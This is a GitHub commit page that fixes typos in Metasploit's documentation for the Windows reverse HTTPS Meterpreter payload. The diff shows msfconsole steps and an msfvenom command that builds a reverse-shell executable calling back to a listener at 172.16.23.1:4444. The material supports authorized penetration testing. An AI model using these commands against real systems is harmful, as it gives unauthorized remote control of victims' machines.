Skip to content

Commit f6751f3

Browse files
committed
Fix typos
1 parent 8817de7 commit f6751f3

File tree

1 file changed

+2
-2
lines changed

1 file changed

+2
-2
lines changed

documentation/modules/payload/windows/meterpreter/reverse_https.md

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -56,13 +56,13 @@ set TARGET [index]
5656
To actually set the payload:
5757

5858
1. In msfconsole, load the exploit.
59-
2. Do: ```set PAYLOAD linux/x86/meterpreter/reverse_https```
59+
2. Do: ```set PAYLOAD windows/meterpreter/reverse_https```
6060
3. Set the ```LHOST``` OPTION WHICH, which [IP the same the payload connect to](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-a-reverse-shell-in-Metasploit).
6161
4. Run th exploit
6262

6363
**As a standalone**
6464

65-
To generate linux/x86/meterpreter/reverse_https, you can do this from msfvenom:
65+
To generate windows/meterpreter/reverse_https, you can do this from msfvenom:
6666

6767
```
6868
./msfvenom -p windows/meterpreter/reverse_https lhost=172.16.23.1 lport=4444 -f exe -o /tmp/https.exe

0 commit comments

Comments
 (0)